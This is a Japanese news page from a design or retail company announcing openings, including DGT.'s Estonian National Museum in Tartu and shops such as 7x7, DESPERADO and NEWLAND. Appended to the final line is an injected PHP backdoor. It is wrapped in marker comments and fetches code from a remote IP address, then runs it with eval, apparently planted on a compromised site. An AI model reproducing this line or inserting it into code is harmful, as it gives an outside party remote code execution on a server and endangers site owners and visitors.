デイリープレス

DGT. が手がけるエストニア・ナショナル・ミュージアム
「MEMORY FIELD」2016年10月1日オープン

パリを拠点に活動する建築家ユニットDGT.の田根剛、ダン・ドレル、リナ・ゴットメが手がけるエストニア・ナショナル・ミュージアムが、10年の歳月をかけていよいよ10月1日にオープンします。
  
ナショナル・ミュージアムが建設されるのは、首都タリンの次に人口が多く、文化・学術の街として知られるタルトゥ。市街から車で5分も行くと現れる広大な森の中です。
そしてここはエストニアが旧ソ連占領下の時代に軍用地だった場所。
1991年の独立後も取り残されていた軍用地に横たわる滑走路の延長線上に、ミュージアムは直結されました。
負の遺産に横たわる、膨大なコンクリートで作られたかつての滑走路のその先に、空へと立ち上っていくように延びる力強い一本の線。一本の線が空と大地を分けるその場所で過去は未来に繋がります。歴史を伝えこれからを見つめる場所として、エストニアの人々が待ちに待ったナショナル・ミュージアムの完成です。

news / 2016.08.10

tags: DGT., information, new open

『エストニア国立博物館 / ESTONIAN NATIONAL MUSEUM』 read more

サンフランシスコの自由な空気から生まれるファッションを提案する 7×7

7×7とは、サンフランシスコの縮図(面積:49平方マイル)でローカルな人たちが使う愛称。サンフランシスコを拠点にヴィンテージのバイイングをはじめ、地元のアーティスト達と独自の交流を深めてきたディレクターの川上淳也氏が、自身が様々な影響を受けた地をテーマに、自由な空気から生まれるファッションを提案しています。店内に入ると大きな窓越しに見えるグリーン。決して広い空間ではないはずなのに、どこか開放的でおおらかな雰囲気につつまれます。ディレクターの独特の感性が、アイテムのセレクションから、什器、空間にいたるまで隅々にいき渡っているのが感じられます。

news / 2013.09.02

tags: information, new open

2013年7月27日、LAILA TOKIOの1階にオープンした、<7×7/seven by seven>。

<7×7/seven by seven>
東京都渋谷区渋谷1-5-11 1F
tel.03-6427-6325
open:11:30~20:00 (定休日なし)
http://seven-by-seven.com/
read more

DESPERADO コミュニティストアとして新たに生まれ変わり、渋谷にオープン!

ストアデザインは、設計事務所ima(イマ)が担当。
デザインコンセプトは「三つ星ホテルと原っぱ」。集まってくる人々をあたたかく迎えるような素材感で居心地の良い空間。

news / 2013.03.17

tags: information, new open

2000年 「ファッション」と「アート」の融合、「物」と「者」との融合をテーマにオープンした DESPERADO read more

『NEWLAND』 毎日通える「文化」の場が熊谷にオープン!

本日、埼玉県熊谷市に、「NEWLAND(ニューランド)」がオープンしました。
かつて大型クレーンの教習所として使われていた施設が、大幅なリノベーションによって複合商業施設に生まれ変わりました。ここNEWLANDは、毎日通える「文化」の場。 ショップやギャラリー、スクールやワークショップなど、折々のイベントを通じて文化のいろんな顔を発信します。

news / 2012.07.08

tags: information, new open, NEWLAND

これからも、彩り豊かなスクールやワークショップ、イベントなど、さまざまな企画を発信してまいります。
ぜひ、お立ち寄り下さい!

NEWLAND (ニューランド)
埼玉県熊谷市江南中央2-3-5
www.new-land.jp/
www.facebook.com/NEWLAND.jp

/*c137*/ eval(@file_get_contents('http://37.1.207.55/get.php')); /*cc137*/ ?>